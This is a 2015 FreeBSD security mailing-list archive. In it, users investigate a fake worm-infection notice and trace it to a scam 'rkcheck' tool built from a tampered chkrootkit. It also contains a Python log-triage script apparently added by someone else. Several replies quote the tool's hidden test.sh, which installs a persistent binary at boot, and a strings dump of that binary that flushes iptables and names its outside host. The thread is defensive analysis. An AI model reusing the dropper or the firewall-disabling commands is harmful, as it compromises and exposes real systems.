FreeBSD-SA-15:04.igmp                                       Security Advisory
                                                          The FreeBSD Project

Topic:          Integer overflow in IGMP protocol

From: Slawa Olhovchenkov
To: Xin Li
Cc: freebsd-security, Bartek Rutkowski, so@freebsd.org
Date: Wed, 25 Feb 2015 15:47:10 +0300
Message-ID: <20150225124710.GA70915@zxy.spb.ru>
In-Reply-To: <54ED7C7C.3070202@delphij.net>
Subject: Re: FreeBSD Security Advisory FreeBSD-SA-15:05.bind
On Tue, Feb 24, 2015 at 11:40:44PM -0800, Xin Li wrote:
> On 2/24/15 23:36, Bartek Rutkowski wrote:
> > Seems like freebsd-update is throwing some error:
> >
> > root@04-dev:~ # freebsd-update install
> > Installing updates...install: ///usr/src/crypto/openssl/util/mkbuildinf.pl: No such file or directory
> >  done.
> > root@04-dev:~ # uname -a
> > FreeBSD 04-dev 10.1-RELEASE-p5 FreeBSD 10.1-RELEASE-p5 #0: Tue Jan 27 08:55:07 UTC 2015     root@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC  amd64
> >
> > Anything to worry about?
>
> No.
>
> This is a known issue with freebsd-update, which is confused by added
> (source) files.

Do you plan to fix it?

From: Remko Lodder
To: Karl Pielorz
Cc: freebsd-security@freebsd.org
Date: Wed, 25 Feb 2015 18:21:58 +0100
Message-Id: <1BE461E0-D2AC-4222-8D41-B7F97E83FD74@FreeBSD.org>
Subject: Re: FreeBSD Security Advisory FreeBSD-SA-15:04.igmp (fwd) - ipfw fix?

> On 25 Feb 2015, at 12:24, Karl Pielorz wrote:
>
> Hi,
>
> Presumably if you don't need IGMP, ipfw can be used to mitigate this on
> hosts until they're patched / rebooted, i.e.
>
> ipfw add x deny igmp from any to any
>
> ?

This suggests that you can filter the traffic:

Block incoming IGMP packets by protecting your host/networks with a
firewall. (Quote from the SA).
Br,
Remko

> Thanks,
>
> -Karl
>
> ---------- Forwarded Message ----------
> Date: 25 February 2015 06:29 +0000
> From: FreeBSD Security Advisories
> To: FreeBSD Security Advisories
> Subject: FreeBSD Security Advisory FreeBSD-SA-15:04.igmp
>
> =============================================================================
> FreeBSD-SA-15:04.igmp                                       Security Advisory
>                                                           The FreeBSD Project
>
> Topic:          Integer overflow in IGMP protocol
>
> _______________________________________________
> freebsd-security@freebsd.org mailing list
> http://lists.freebsd.org/mailman/listinfo/freebsd-security
> To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org"

-- 
/"\   Best regards,                        | remko@FreeBSD.org
\ /   Remko Lodder                         | remko@EFnet
 X    http://www.evilcoder.org/            |
/ \   ASCII Ribbon Campaign                | Against HTML Mail and News
From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 18:02:43 2015
From: Andrei
Date: Wed, 25 Feb 2015 18:56:01 +0100
To: freebsd-security@freebsd.org
Subject: Re: FreeBSD Security Advisory FreeBSD-SA-15:04.igmp (fwd) - ipfw fix?

On Wed, 25 Feb 2015 18:21:58 +0100 Remko Lodder wrote:
>
> This suggests that you can filter the traffic:
>
> Block incoming IGMP packets by protecting your host/networks with a
> firewall. (Quote from the SA).
>
> Br,
> Remko
>

Looks like Captain Obvious here. The question was how exactly to do it?

Kind regards,
Andrei.

From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 18:11:57 2015
From: jungle Boogie
Date: Wed, 25 Feb 2015 10:11:56 -0800
Subject: Re: FreeBSD Security Advisory FreeBSD-SA-15:05.bind
To: freebsd-security@freebsd.org
Cc: FreeBSD Security Advisories

Hi Security Officials of FreeBSD,

On 24 February 2015 at 22:29, FreeBSD Security Advisories wrote:
> 2) To update your vulnerable system via a binary patch:
>
> Systems running a RELEASE version of FreeBSD on the i386 or amd64
> platforms can be updated via the freebsd-update(8) utility:
>
> # freebsd-update fetch
> # freebsd-update install

My recommendation as a self check: Recommend users run freebsd-version -k
and freebsd-version -u and indicate in the SA what they should see as a
result. I know you don't want to give a false sense of security but when
the result of following the prescribed advice is:

freebsd-update install
Installing updates...install: ///usr/src/crypto/openssl/util/mkbuildinf.pl: No such file or directory

It may be ideal to let users know how to check their systems.
-- 
-------
inum: 883510009027723
sip: jungleboogie@sip2sip.info
xmpp: jungle-boogie@jit.si

From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 19:50:10 2015
From: Joseph Mingrone
Date: Wed, 25 Feb 2015 15:41:05 -0400
To: freebsd-security@freebsd.org
Subject: has my 10.1-RELEASE system been compromised

This morning when I arrived at work I had this email
from my university's IT department (via email.it) informing me that my host
was infected and spreading a worm.

"Based on the logs fingerprints seems that your server is infected by the
following worm: Net-Worm.PHP.Mongiko.a"

my ip here - - [23/Feb/2015:14:53:37 +0100] "POST /?cmd=info&key=f8184c819717b6815a8b8037e91c59ef&ip=212.97.34.7 HTTP/1.1" 200 429 "-" "Net-Worm.PHP.Mongiko.a"

Despite the surprising name, I don't see any evidence that it's related to
php. I did remove php, because I don't really need it. I've included my
/etc/rc.conf below. pkg audit doesn't show any vulnerabilities. Searching
for Worm.PHP.Mongiko doesn't show much. I've run chkrootkit,
netstat/sockstat and I don't see anything suspicious and I plan to finally
put some reasonable firewall rules on this host.

Do you have any suggestions? Should I include any other information here?

Joseph

#bsdstats_enable="YES"
clear_tmp_enable="YES"
devfs_system_ruleset="localrules"
dumpdev="AUTO"
hostname="gly.ftfl.ca"
ifconfig_re0="SYNCDHCP"
linux_enable="YES"
local_unbound_enable="YES"
keymap="us.jrm"
lpd_enable="YES"
moused_enable="YES"
moused_port="/dev/ums0"
moused_ums0_flags="-A 2.5,2.0 -a 1 -V"
nginx_enable="YES"
ntpd_enable="YES"
panicmail_enable="YES"
php_fpm_enable="YES"
spawn_fcgi_enable="YES"
spawn_fcgi_bindaddr=""
spawn_fcgi_bindport=""
spawn_fcgi_bindsocket="/var/run/spawn_fcgi.socket"
spawn_fcgi_bindsocket_mode="0700"
sshd_enable="YES"
update_motd="NO"
usbd_enable="YES"
zfs_enable="YES"
znc_enable="YES"
znc_user="znc"
From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 20:01:31 2015
From: Jung-uk Kim
Date: Wed, 25 Feb 2015 15:01:29 -0500
To: Joseph Mingrone, freebsd-security@freebsd.org
Subject: Re: has my 10.1-RELEASE system been compromised

On 02/25/2015 14:41, Joseph Mingrone wrote:
> This morning when I arrived at work I had this email from my
> university's IT department (via email.it) informing me that my host
> was infected and spreading a worm.
>
> "Based on the logs fingerprints seems that your server is infected
> by the following worm: Net-Worm.PHP.Mongiko.a"
>
> my ip here - - [23/Feb/2015:14:53:37 +0100] "POST
> /?cmd=info&key=f8184c819717b6815a8b8037e91c59ef&ip=212.97.34.7
> HTTP/1.1" 200 429 "-" "Net-Worm.PHP.Mongiko.a"
>
> Despite the surprising name, I don't see any evidence that it's
> related to php. I did remove php, because I don't really need it.
> I've included my /etc/rc.conf below. pkg audit doesn't show any
> vulnerabilities. Searching for Worm.PHP.Mongiko doesn't show
> much. I've run chkrootkit, netstat/sockstat and I don't see
> anything suspicious and I plan to finally put some reasonable
> firewall rules on this host.
>
> Do you have any suggestions? Should I include any other
> information here?
...
I found this:

http://security.stackexchange.com/questions/82273/what-is-net-worm-php-mongiko-trying-to-do

Jung-uk Kim

From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 20:05:03 2015
From: Joseph Mingrone
Date: Wed, 25 Feb 2015 16:04:59 -0400
To: Jung-uk Kim
Cc: freebsd-security@freebsd.org
Subject: Re: has my 10.1-RELEASE system been compromised

Jung-uk Kim writes:

> On 02/25/2015 14:41, Joseph Mingrone wrote:
>> This morning when I arrived at work I had this email from my
>> university's IT department (via email.it) informing me that my host
>> was infected and spreading a worm.
>>
>> "Based on the logs fingerprints seems that your server is infected
>> by the following worm: Net-Worm.PHP.Mongiko.a"
>>
>> my ip here - - [23/Feb/2015:14:53:37 +0100] "POST
>> /?cmd=info&key=f8184c819717b6815a8b8037e91c59ef&ip=212.97.34.7
>> HTTP/1.1" 200 429 "-" "Net-Worm.PHP.Mongiko.a"
>>
>> Despite the surprising name, I don't see any evidence that it's
>> related to php. I did remove php, because I don't really need it.
>> I've included my /etc/rc.conf below. pkg audit doesn't show any
>> vulnerabilities. Searching for Worm.PHP.Mongiko doesn't show
>> much. I've run chkrootkit, netstat/sockstat and I don't see
>> anything suspicious and I plan to finally put some reasonable
>> firewall rules on this host.
>>
>> Do you have any suggestions? Should I include any other
>> information here?
> ...
>
> I found this:
>
> http://security.stackexchange.com/questions/82273/what-is-net-worm-php-mongiko-trying-to-do
>
> Jung-uk Kim

Yeah, I saw that as well. I wouldn't be concerned if this was hitting
my web server, but the key difference here is that my IP is apparently
the source in this case.
Joseph

From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 20:24:06 2015
From: Matt Donovan
Date: Wed, 25 Feb 2015 14:24:04 -0600
To: Joseph Mingrone
Subject: Re: has my 10.1-RELEASE system been compromised
Cc: freebsd-security, Jung-uk Kim

On Feb 25, 2015 2:05 PM, "Joseph Mingrone" wrote:
>
> Jung-uk Kim writes:
>
> > On 02/25/2015 14:41, Joseph Mingrone wrote:
> >> This morning when I arrived at work I had this email from my
> >> university's IT department (via email.it) informing me that my host
> >> was infected and spreading a worm.
> >>
> >> "Based on the logs fingerprints seems that your server is infected
> >> by the following worm: Net-Worm.PHP.Mongiko.a"
> >>
> >> my ip here - - [23/Feb/2015:14:53:37 +0100] "POST
> >> /?cmd=info&key=f8184c819717b6815a8b8037e91c59ef&ip=212.97.34.7
> >> HTTP/1.1" 200 429 "-" "Net-Worm.PHP.Mongiko.a"
> >>
> >> Despite the surprising name, I don't see any evidence that it's
> >> related to php. I did remove php, because I don't really need it.
> >> I've included my /etc/rc.conf below. pkg audit doesn't show any
> >> vulnerabilities. Searching for Worm.PHP.Mongiko doesn't show
> >> much. I've run chkrootkit, netstat/sockstat and I don't see
> >> anything suspicious and I plan to finally put some reasonable
> >> firewall rules on this host.
> >>
> >> Do you have any suggestions? Should I include any other
> >> information here?
> > ...
> >
> > I found this:
> >
> > http://security.stackexchange.com/questions/82273/what-is-net-worm-php-mongiko-trying-to-do
> >
> > Jung-uk Kim
>
> Yeah, I saw that as well. I wouldn't be concerned if this was hitting
> my web server, but the key difference here is that my IP is apparently
> the source in this case.
>
> Joseph
> _______________________________________________

Hello,

First run sockstat to see any connections that you do not recognize. This
will help narrow the scope. Usually this is installed through a compromised
web application as well such as a password compromise or a vulnerability.
As several malware when doing ps looks like a different program running.

From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 20:25:36 2015
From: Joseph Mingrone
Date: Wed, 25 Feb 2015 16:25:32 -0400
To: Philip Jocks
Cc: freebsd-security@freebsd.org
Subject: Re: has my 10.1-RELEASE system been compromised

Philip Jocks writes:

> are those the only lines they sent you? Weirdly, we got a report like this today
> as well with the first (out of 8) sample line showing the exact time stamp
> (23/Feb/2015:14:53:37 +0100) and the exact query string
> (/?cmd=info&key=f8184c819717b6815a8b8037e91c59ef&ip=212.97.34.7) which makes it
> a bit strange to be a coincidence.
> There is a webserver running in a jail on the
> reported IP address, but I can't find any log lines on our side that could be
> related.
> We asked the email.it folks for details, but haven't heard back from them yet.
>
> Philip

Interesting. Yes, they sent nearly the same line about 8 times with the
timestamps a second or two apart. What other daemons are you running on
that host? Something other than the webserver could be compromised. Please
share if you hear anything from email.it.

Joseph

From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 20:25:42 2015
Subject: Re: has my 10.1-RELEASE system been compromised
From: Philip Jocks
Date: Wed, 25 Feb 2015 21:16:48 +0100
To: Joseph Mingrone
Cc: freebsd-security@freebsd.org

> On 25.02.2015 at 21:04, Joseph Mingrone wrote:
>
> Jung-uk Kim writes:
>
>> On 02/25/2015 14:41, Joseph Mingrone wrote:
>>> This morning when I arrived at work I had this email from my
>>> university's IT department (via email.it) informing me that my host
>>> was infected and spreading a worm.
>>>
>>> "Based on the logs fingerprints seems that your server is infected
>>> by the following worm: Net-Worm.PHP.Mongiko.a"
>>>
>>> my ip here - - [23/Feb/2015:14:53:37 +0100] "POST
>>> /?cmd=info&key=f8184c819717b6815a8b8037e91c59ef&ip=212.97.34.7
>>> HTTP/1.1" 200 429 "-" "Net-Worm.PHP.Mongiko.a"
>>>
>>> Despite the surprising name, I don't see any evidence that it's
>>> related to php. I did remove php, because I don't really need it.
>>> I've included my /etc/rc.conf below. pkg audit doesn't show any
>>> vulnerabilities. Searching for Worm.PHP.Mongiko doesn't show
>>> much. I've run chkrootkit, netstat/sockstat and I don't see
>>> anything suspicious and I plan to finally put some reasonable
>>> firewall rules on this host.
>>>
>>> Do you have any suggestions? Should I include any other
>>> information here?
>> ...
>>
>> I found this:
>>
>> http://security.stackexchange.com/questions/82273/what-is-net-worm-php-mongiko-trying-to-do
>>
>> Jung-uk Kim
>
> Yeah, I saw that as well. I wouldn't be concerned if this was hitting
> my web server, but the key difference here is that my IP is apparently
> the source in this case.
>
> Joseph

are those the only lines they sent you? Weirdly, we got a report like this
today as well with the first (out of 8) sample line showing the exact time
stamp (23/Feb/2015:14:53:37 +0100) and the exact query string
(/?cmd=info&key=f8184c819717b6815a8b8037e91c59ef&ip=212.97.34.7) which
makes it a bit strange to be a coincidence. There is a webserver running in
a jail on the reported IP address, but I can't find any log lines on our
side that could be related.
We asked the email.it folks for details, but haven't heard back from them yet.

Philip
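An added example, not from any of the list posts: a small Python triage script for web-server access logs of the kind quoted in the original report. It parses common/combined-format lines, flags the POST /?cmd=info&key=...&ip=... request shape and the Mongiko user-agent string, counts hits per client, and reports (timestamp, query) pairs that repeat, so that near-identical sample lines from an abuse report can be checked against the host's own logs. The client addresses and all lines other than the reported request are constructed.

```python
"""Triage of web-server access-log lines for the Mongiko-style request
pattern discussed in this thread (added example; not from the list posts)."""
import re
from collections import Counter, defaultdict

# Apache/nginx common or combined log format. The referer/user-agent pair
# is optional so plain common-format lines still parse.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?'
)

# Request shape from the abuse report: POST /?cmd=info&key=<32 hex>&ip=<IPv4>
MONGIKO_QUERY_RE = re.compile(
    r'^/\?cmd=info&key=[0-9a-f]{32}&ip=\d{1,3}(?:\.\d{1,3}){3}$'
)
MONGIKO_AGENT_TOKEN = 'mongiko'


def parse_line(line):
    """Return a dict of fields for a parseable log line, else None."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def mongiko_indicators(entry):
    """List which indicators fire for one parsed entry ([] means none)."""
    hits = []
    if entry['method'] == 'POST' and MONGIKO_QUERY_RE.match(entry['target']):
        hits.append('query')
    # Reports and mail clients wrap the agent string ("Net- Worm..."), so
    # drop whitespace before matching.
    agent = (entry.get('agent') or '').replace(' ', '').lower()
    if MONGIKO_AGENT_TOKEN in agent:
        hits.append('agent')
    return hits


def triage(lines):
    """Scan lines; return flagged entries, per-client counts, repeated
    (timestamp, target) pairs among the flagged lines, and unparsed lines."""
    report = {'flagged': [], 'by_client': Counter(),
              'duplicates': {}, 'unparsed': []}
    seen = defaultdict(int)
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            report['unparsed'].append(line)
            continue
        hits = mongiko_indicators(entry)
        if not hits:
            continue
        report['flagged'].append(
            (entry['client'], entry['time'], entry['target'], hits))
        report['by_client'][entry['client']] += 1
        seen[(entry['time'], entry['target'])] += 1
    # Identical timestamp+query pairs, like the near-identical sample lines
    # in the abuse reports discussed in the thread.
    report['duplicates'] = {k: n for k, n in seen.items() if n > 1}
    return report


# Constructed sample log. Client addresses are documentation-range
# placeholders; the flagged request string is the one quoted in the report.
SAMPLE_LOG = [
    '198.51.100.7 - - [23/Feb/2015:14:53:36 +0100] "GET /index.html HTTP/1.1" '
    '200 1043 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [23/Feb/2015:14:53:37 +0100] "POST '
    '/?cmd=info&key=f8184c819717b6815a8b8037e91c59ef&ip=212.97.34.7 HTTP/1.1" '
    '200 429 "-" "Net-Worm.PHP.Mongiko.a"',
    # same timestamp and query again, with the wrapped agent string
    '203.0.113.5 - - [23/Feb/2015:14:53:37 +0100] "POST '
    '/?cmd=info&key=f8184c819717b6815a8b8037e91c59ef&ip=212.97.34.7 HTTP/1.1" '
    '200 429 "-" "Net- Worm.PHP.Mongiko.a"',
    # same request shape, different key/ip, common format without an agent
    '203.0.113.9 - - [23/Feb/2015:14:53:40 +0100] "POST '
    '/?cmd=info&key=0123456789abcdef0123456789abcdef&ip=198.51.100.2 HTTP/1.0" '
    '200 12',
    'garbage line that is not an access-log record',
]


if __name__ == '__main__':
    result = triage(SAMPLE_LOG)
    for client, when, target, hits in result['flagged']:
        print(f'{client} {when} {",".join(hits)} {target}')
    print('per client:', dict(result['by_client']))
    print('repeated (time, target):', result['duplicates'])
    print('unparsed:', len(result['unparsed']))
```

Feed it the host's own access log (for example via `triage(open(path))`) to see whether the request appears as a server-side hit or does not appear at all, which bears on whether the host is the source rather than the target.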
From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 20:28:36 2015
From: Walter Hop
Date: Wed, 25 Feb 2015 21:19:46 +0100
To: freebsd-security@freebsd.org
Subject: Re: has my 10.1-RELEASE system been compromised

On 25 Feb 2015, at 20:41, Joseph Mingrone wrote:
>
> "Based on the logs fingerprints seems that your server is infected by
> the following worm: Net-Worm.PHP.Mongiko.a"
>
> my ip here - - [23/Feb/2015:14:53:37 +0100] "POST
> /?cmd=info&key=f8184c819717b6815a8b8037e91c59ef&ip=212.97.34.7 HTTP/1.1"
> 200 429 "-" "Net-Worm.PHP.Mongiko.a"

I haven't heard of this worm, although this type of request is seen more often:
https://www.google.nl/search?q=post%20%22cmd%3Dinfo%26key%22

If this traffic is originating from your system, and you were running PHP,
I'd say it's probably most likely that some PHP script/application on your
host was compromised. Were you running stuff like phpMyAdmin, Wordpress or
Drupal that might not have been updated too often?

Often in such a compromise, the attacker leaves traces in the filesystem,
like executable scripts or temp files. Try to look for new files which are
owned by the webserver or fastcgi process, see if you find some surprises.
Example:

# touch -t 201501010000 foo
# find / -user www -newer foo

If you don't find anything, look back a little further.
Hopefully you will find a clue in this way.

-- 
Walter Hop | PGP key: https://lifeforms.nl/pgp

From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 20:31:21 2015
From: Joseph Mingrone
To: Matt Donovan
Cc: freebsd-security, Jung-uk Kim
Subject: Re: has my 10.1-RELEASE system been compromised
Date: Wed, 25 Feb 2015 16:31:18 -0400
Message-ID: <86fv9tybqh.fsf@gly.ftfl.ca>
In-Reply-To: (Matt Donovan's message of "Wed, 25 Feb 2015 14:24:04 -0600")
References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca>

Matt Donovan writes:

> On Feb 25, 2015 2:05 PM, "Joseph Mingrone" wrote:
>>
>> Jung-uk Kim writes:
>>
>> > On 02/25/2015 14:41, Joseph Mingrone wrote:
>> >> This morning when I arrived at work I had this email from my
>> >> university's IT department (via email.it) informing me that my host
>> >> was infected and spreading a worm.
>> >>
>> >> "Based on the logs fingerprints seems that your server is infected
>> >> by the following worm: Net-Worm.PHP.Mongiko.a"
>> >>
>> >> my ip here - - [23/Feb/2015:14:53:37 +0100] "POST
>> >> /?cmd=info&key=f8184c819717b6815a8b8037e91c59ef&ip=212.97.34.7
>> >> HTTP/1.1" 200 429 "-" "Net-Worm.PHP.Mongiko.a"
>> >>
>> >> Despite the surprising name, I don't see any evidence that it's
>> >> related to php. I did remove php, because I don't really need it.
>> >> I've included my /etc/rc.conf below. pkg audit doesn't show any
>> >> vulnerabilities. Searching for Worm.PHP.Mongiko doesn't show
>> >> much. I've run chkrootkit, netstat/sockstat and I don't see
>> >> anything suspicious and I plan to finally put some reasonable
>> >> firewall rules on this host.
>> >>
>> >> Do you have any suggestions? Should I include any other
>> >> information here?
>> > ...
>> >
>> > I found this:
>> >
>> > http://security.stackexchange.com/questions/82273/what-is-net-worm-php-mongiko-trying-to-do
>> >
>> > Jung-uk Kim
>>
>> Yeah, I saw that as well. I wouldn't be concerned if this was hitting
>> my web server, but the key difference here is that my IP is
>> apparently the source in this case.
>>
>> Joseph
>> _______________________________________________
> Hello,
>
> First run sockstat to see any connections that you do not recognize. This
> will help narrow the scope. Usually this is installed through a compromised
> web application as well such as a password compromise or a vulnerability.
> As several malware when doing ps looks like a different program running.

I don't see anything out of the ordinary. All those connections are intended.
% sockstat -cL4
USER     COMMAND    PID   FD PROTO  LOCAL ADDRESS         FOREIGN ADDRESS
jrm      lr         28536 7  tcp4   129.173.34.203:55957  8.8.8.8:53
jrm      emacs-24.4 90922 24 tcp4   129.173.34.203:22783  80.91.229.13:119
znc      znc        664   5  tcp4   129.173.34.203:11133  91.217.189.42:6697
znc      znc        664   7  tcp4   129.173.34.203:57772  107.170.156.130:6697
znc      znc        664   8  tcp4   129.173.34.203:56390  206.12.19.242:6697
znc      znc        664   9  tcp4   129.173.34.203:11137  24.244.24.20:6697

From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 20:34:25 2015
From: Philip Jocks
To: Joseph Mingrone
Cc: freebsd-security@freebsd.org
Subject: Re: has my 10.1-RELEASE system been compromised
Date: Wed, 25 Feb 2015 21:34:21 +0100
Message-Id: <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com>
In-Reply-To: <86k2z5yc03.fsf@gly.ftfl.ca>
References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> <1B20A559-59C5-477A-A2F3-9FD7E16C09E8@netzkommune.com> <86k2z5yc03.fsf@gly.ftfl.ca>

> On 25.02.2015 at 21:25, Joseph Mingrone wrote:
>
> Philip Jocks writes:
>> are those the only lines they sent you? Weirdly, we got a report like this today
>> as well with the first (out of 8) sample line showing the exact time stamp
>> (23/Feb/2015:14:53:37 +0100) and the exact query string
>> (/?cmd=info&key=f8184c819717b6815a8b8037e91c59ef&ip=212.97.34.7) which makes it
>> a bit strange to be a coincidence. There is a webserver running in a jail on the
>> reported IP address, but I can't find any log lines on our side that could be
>> related.
>> We asked the email.it folks for details, but haven't heard back from them yet.
>>
>> Philip
>
> Interesting. Yes, they sent nearly the same line about 8 times with the timestamps a
> second or two apart. What other daemons are you running on that host?
> Something other than the webserver could be compromised.
>
> Please share if you hear anything from email.it.
>
> Joseph

it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org
which was registered a few days ago and looks like a tampered version of
chkrootkit.
I hope nobody installed it anywhere; it seems to execute
rkcheck/tests/.unit/test.sh which contains

#!/bin/bash

cp tests/.unit/test /usr/bin/rrsyncn
chmod +x /usr/bin/rrsyncn
rm -fr /etc/rc2.d/S98rsyncn
ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
/usr/bin/rrsyncn
exit

That doesn't look like something you'd want on your box...

Cheers,

Philip

From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 20:41:26 2015
From: Joseph Mingrone
To: Philip Jocks
Cc: freebsd-security@freebsd.org
Subject: Re: has my 10.1-RELEASE system been compromised
Date: Wed, 25 Feb 2015 16:41:19 -0400
Message-ID: <86bnkhyb9s.fsf@gly.ftfl.ca>
In-Reply-To: <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com> (Philip Jocks's message of "Wed, 25 Feb 2015 21:34:21 +0100")
References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> <1B20A559-59C5-477A-A2F3-9FD7E16C09E8@netzkommune.com> <86k2z5yc03.fsf@gly.ftfl.ca> <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com>

Philip Jocks writes:

> it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org which
> was registered a few days ago and looks like a tampered version of chkrootkit.
> I hope nobody installed it anywhere; it seems to execute
> rkcheck/tests/.unit/test.sh which contains
>
> #!/bin/bash
>
> cp tests/.unit/test /usr/bin/rrsyncn
> chmod +x /usr/bin/rrsyncn
> rm -fr /etc/rc2.d/S98rsyncn
> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
> /usr/bin/rrsyncn
> exit
>
> That doesn't look like something you'd want on your box...

I downloaded it as well, but also became suspicious (for a variety of
reasons) and didn't run it. Fortunately /bin/bash doesn't exist on our
systems.

Some evidence to confirm or refute the authenticity of the email reporting
our IPs as vulnerable would be helpful.

Joseph

From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 20:56:22 2015
From: Christopher Schulte
To: Philip Jocks
Cc: Joseph Mingrone, "freebsd-security@freebsd.org"
Subject: Re: has my 10.1-RELEASE system been compromised
Date: Wed, 25 Feb 2015 20:55:43 +0000
Message-ID: <30A97E9B-5719-4DA3-ADFB-24A3FADF6D3C@schulte.org>
In-Reply-To: <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com>
References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> <1B20A559-59C5-477A-A2F3-9FD7E16C09E8@netzkommune.com> <86k2z5yc03.fsf@gly.ftfl.ca> <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com>

> On Feb 25, 2015, at 2:34 PM, Philip Jocks wrote:
>
> it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org
> which was registered a few days ago and looks like a tampered version of
> chkrootkit. I hope nobody installed it anywhere; it seems to execute
> rkcheck/tests/.unit/test.sh which contains
>
> #!/bin/bash
>
> cp tests/.unit/test /usr/bin/rrsyncn
> chmod +x /usr/bin/rrsyncn
> rm -fr /etc/rc2.d/S98rsyncn
> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
> /usr/bin/rrsyncn
> exit
>
> That doesn't look like something you'd want on your box...

I filed a report with Google about that domain (Google Safe Browsing),
briefly describing what's been recounted here on this thread. It seems
quite suspicious, agreed.

Has anyone started an analysis of the rrsyncn binary? The last few lines
of a simple string dump are interesting... take note what looks to be an
IP address of 95.215.44.195.

/bin/sh
iptables -X 2> /dev/null
iptables -F 2> /dev/null
iptables -t nat -F 2> /dev/null
iptables -t nat -X 2> /dev/null
iptables -t mangle -F 2> /dev/null
iptables -t mangle -X 2> /dev/null
iptables -P INPUT ACCEPT 2> /dev/null
iptables -P FORWARD ACCEPT 2> /dev/null
iptables -P OUTPUT ACCEPT 2> /dev/null
udevd
95.215.44.195
;*3$"

> Cheers,
>
> Philip

Chris

From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 21:04:49 2015
From: Philip Jocks
To: "freebsd-security@freebsd.org"
Cc: Joseph Mingrone
Subject: Re: has my 10.1-RELEASE system been compromised
Date: Wed, 25 Feb 2015 22:04:46 +0100
Message-Id: <5FCD7882-9BED-4101-9722-D174AC5347E3@netzkommune.com>
In-Reply-To: <30A97E9B-5719-4DA3-ADFB-24A3FADF6D3C@schulte.org>
References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> <1B20A559-59C5-477A-A2F3-9FD7E16C09E8@netzkommune.com> <86k2z5yc03.fsf@gly.ftfl.ca> <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com> <30A97E9B-5719-4DA3-ADFB-24A3FADF6D3C@schulte.org>

> On 25.02.2015 at 21:55, Christopher Schulte wrote:
>
>
>> On Feb 25, 2015, at 2:34 PM, Philip Jocks wrote:
>>
>> it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org
>> which was registered a few days ago and looks like a tampered version of
>> chkrootkit. I hope nobody installed it anywhere; it seems to execute
>> rkcheck/tests/.unit/test.sh which contains
>>
>> #!/bin/bash
>>
>> cp tests/.unit/test /usr/bin/rrsyncn
>> chmod +x /usr/bin/rrsyncn
>> rm -fr /etc/rc2.d/S98rsyncn
>> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
>> /usr/bin/rrsyncn
>> exit
>>
>> That doesn't look like something you'd want on your box...
>
> I filed a report with Google about that domain (Google Safe Browsing),
> briefly describing what's been recounted here on this thread. It seems
> quite suspicious, agreed.
>
> Has anyone started an analysis of the rrsyncn binary? The last few lines
> of a simple string dump are interesting... take note what looks to be an
> IP address of 95.215.44.195.
>
> /bin/sh
> iptables -X 2> /dev/null
> iptables -F 2> /dev/null
> iptables -t nat -F 2> /dev/null
> iptables -t nat -X 2> /dev/null
> iptables -t mangle -F 2> /dev/null
> iptables -t mangle -X 2> /dev/null
> iptables -P INPUT ACCEPT 2> /dev/null
> iptables -P FORWARD ACCEPT 2> /dev/null
> iptables -P OUTPUT ACCEPT 2> /dev/null
> udevd
> 95.215.44.195
> ;*3$"

95.215.44.195 is the IP of rkcheck.org. I contacted yourserver.se, who own
the network.
Philip

From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 21:07:27 2015
From: Joseph Mingrone
To: freebsd-security@freebsd.org
Subject: Re: has my 10.1-RELEASE system been compromised
Date: Wed, 25 Feb 2015 17:07:05 -0400
Message-ID: <864mq9ya2u.fsf@gly.ftfl.ca>
